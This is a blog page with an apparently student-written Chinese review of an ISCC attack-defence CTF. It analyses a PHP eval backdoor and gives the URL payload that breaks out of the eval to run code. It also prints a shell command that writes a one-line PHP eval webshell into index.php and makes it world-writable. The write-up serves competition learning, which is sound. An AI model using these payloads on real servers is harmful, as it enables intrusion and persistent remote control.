<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="对未来的最大慷慨，就是把一切都献给现在。">
    

    <!--Author-->
    
        <meta name="author" content="Luc1fer">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="2019 ISCC线下赛回顾">
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="对未来的最大慷慨，就是把一切都献给现在。">
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Luc1fer&#39;blog">

    <!--Type page-->
    
        <meta property="og:type" content="article">
    

    <!--Page Cover-->
    

    <meta name="twitter:card" content="summary">
    

    <!-- Title -->
    
    <title>2019 ISCC线下赛回顾 - Luc1fer&#39;blog</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/style.css">

    <!-- Google Analytics -->
    


</head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories/">
                    Categories
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2018/07/22/ISCC线下赛回顾/">
                2019 ISCC线下赛回顾
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2018-07-22</span>
            
            
            
                <span class="category">
                    <a href="/categories/比赛回顾/">比赛回顾</a>
                </span>
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <p>不比不知道自己跟大佬差距有多大！开局直接全场被大佬挂黑页，等着运维回复几个小时之后好不容易找到shell路径，shell又被其他大佬删了…真是菜哭了，一下午的比赛毫无作为…</p>
<a id="more"></a>

<h2 id="web1-私地渗透"><a href="#web1-私地渗透" class="headerlink" title="web1 私地渗透"></a>web1 私地渗透</h2><p>先是注册页面拿到shell路径，具体操作看SQL那篇吧。</p>
<p>拿到路径之后访问之后是这样的</p>
<pre><code>&lt;?php
show_source(__FILE__);
$a=@$_REQUEST[&apos;a&apos;];
@eval(&quot;var_dump($$a);&quot;);
?&gt;</code></pre><p>先分析一下代码，主要几个函数</p>
<ul>
<li>show_source():查看文件源码</li>
<li>eval():把字符串当做php代码执行</li>
<li>var_dump():打印变量信息，返回值为null</li>
</ul>
<p>这里有明显的变量引用，我们可以控制$a的值来命令执行。</p>
<h3 id="php中单引号与双引号的区别"><a href="#php中单引号与双引号的区别" class="headerlink" title="php中单引号与双引号的区别"></a>php中单引号与双引号的区别</h3><pre><code>&lt;?php
$c=&quot;Luc1fer!&quot;;
echo &quot;My name is &quot;.$c.&quot;&lt;br&gt;&quot;;       //不加引号
echo &quot;My name is &quot;.&apos;$c&apos;.&quot;&lt;br&gt;&quot;;        //单引号
echo &quot;My name is &quot;.&quot;$c&quot;.&quot;&lt;br&gt;&quot;;        //双引号
echo &quot;My name is &quot;.&quot; &apos;$c&apos; &quot;.&quot;&lt;br&gt;&quot;;    //双引号+单引号
echo &quot;My name is &quot;.&apos; &quot;$c&quot; &apos;.&quot;&lt;br&gt;&quot;; //单引号+双引号
?&gt;</code></pre><p>输出结果如下</p>
<pre><code>My name is Luc1fer!                    //正常显示
My name is $c                        //单引号不被解析
My name is Luc1fer!                    //双引号内正常解析
My name is &apos;Luc1fer!&apos;                //双引号内正常解析
My name is &quot;$c&quot;                     //单引号内不被解析</code></pre><h3 id="php变量覆盖"><a href="#php变量覆盖" class="headerlink" title="php变量覆盖"></a>php变量覆盖</h3><p>测试代码：</p>
<pre><code>&lt;?php
show_source(__FILE__);
$b=&quot;Hello,my name is Luc1fer!&quot;;
$a=@$_REQUEST[&apos;a&apos;];
echo $$a;
?&gt;</code></pre><p>结果如下：</p>
<pre><code> &lt;?php
show_source(__FILE__);
$b=&quot;Hello,my name is Luc1fer!&quot;;
$a=@$_REQUEST[&apos;a&apos;];
echo $$a;
?&gt; Hello,my name is Luc1fer!</code></pre><p>代码的执行过程大概为  <code>get一个a--&gt;echo执行从右到左--&gt;echo $$a--&gt;echo $b--&gt;打印$b</code><br>我们可以通过?a=a=”hello”这样的方式来打印hello</p>
<h3 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h3><p>对于var_dump()我们可以构造单引号使其闭合</p>
<pre><code>&lt;?php
show_source(__FILE__);
$a=@$_REQUEST[&apos;a&apos;];
@eval(&quot;var_dump($$a);&quot;);
?&gt;

http://localhost/only-test-php.php?a=a=4);system(phpinfo()</code></pre><p>这样就可以打印phpinfo()信息了</p>
<p>同样的我们可以cat flag了.</p>
<h2 id="私地与高地"><a href="#私地与高地" class="headerlink" title="私地与高地"></a>私地与高地</h2><h3 id="主要问题"><a href="#主要问题" class="headerlink" title="主要问题"></a>主要问题</h3><p>等拿到私地权限之后就只剩40多分钟了，WINSCP死活连不上私地，没办法像往常一样down源码，上监控上waf，有点手忙脚乱，这边Xshell连上了，查看www目录发现全是马，打开几个手动注释了马，其他的都是readonly文件</p>
<ol>
<li>面对被写上的马，如果我是ctf权限，且文件readonly该怎么删掉这个马？</li>
</ol>
<p>赛后和老师讨论，老师说连不上WINSCP为什么不用wegt命令下源码？这个当时确实没想到，下次要注意。还有没上脚本的问题，同学指出可以直接用vim打开之后复制粘贴进去监控脚本，这个当时确实懵圈了，只在那傻傻的手工注释。</p>
<p>2.面对不死马我该怎么去删掉这个不死马？</p>
<p>比赛前准备的方法有kill进程、重启Apache、创建同名文件，这些在这次比赛中都没有真正实践到</p>
<p>3.如何在拿到权限之后批量给别人传马？</p>
<p>说实话我这个地方还是没懂，按理说应该是利用预留的后门然后执行写入命令</p>
<pre><code>echo -e &quot;&lt;?php eval(\@_POST[&apos;a&apos;]);?&gt;&quot; &gt; index.php | chomod 777 index.php</code></pre><p>但是怎么批量呢？用批量提交flag那个么？还带去问问师傅</p>

    </div>

    

    
        <div class="post-tags">
            <i class="fa fa-tags" aria-hidden="true"></i>
            <a href="/tags/比赛回顾/">#比赛回顾</a>
        </div>
    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a href="">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2019/08/31/JavaScript原型污染/">JavaScript Prototype 污染攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/30/SSTI/">SSTI-服务器端模板注入</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/22/HostSplit/">HostSplit-Exploitable</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/19/Black-magic/">black_magic</a>
            </li>
            
        </ul>
    </div>



            
<div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 footer-categories">
    <h2>Categories</h2>
    <ul>
        
        <li>
            <a class="footer-post" href="/categories/比赛回顾/">比赛回顾</a>
        </li>
        
        <li>
            <a class="footer-post" href="/categories/docker/">docker</a>
        </li>
        
        <li>
            <a class="footer-post" href="/categories/wp/">wp</a>
        </li>
        
        <li>
            <a class="footer-post" href="/categories/渗透测试/">渗透测试</a>
        </li>
        
    </ul>
</div>

        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a href="https://github.com/BrainLyh">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    
                    
                    
                    
                    
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:brainsemail@163.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->
<script src="/js/main.js"></script>

<!-- Disqus Comments -->



</body>

</html>